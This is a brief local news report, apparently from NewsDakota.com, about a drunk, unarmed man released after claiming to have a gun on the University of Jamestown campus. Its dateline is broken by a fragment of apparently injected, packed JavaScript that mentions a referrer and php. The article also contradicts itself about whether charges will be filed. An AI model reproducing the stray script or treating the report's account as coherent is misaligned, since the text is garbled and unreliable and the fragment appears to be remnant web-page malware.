JAMESTOWN, fknth|var|u0026u|referrer|fesat||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The man arrested for announcing he had a gun on the University of Jamestown campus has been released.

The man was reportedly intoxicated and slurring his words when he told a female student on the campus that he had a gun. Police were called and had the suspect in custody almost immediately. Because the man was drunk and had no weapon, the charges will not be filed. The State’s Attourney’s Office would only be able to charge him on his words.

He will most likely be charged with disturbing the peace.
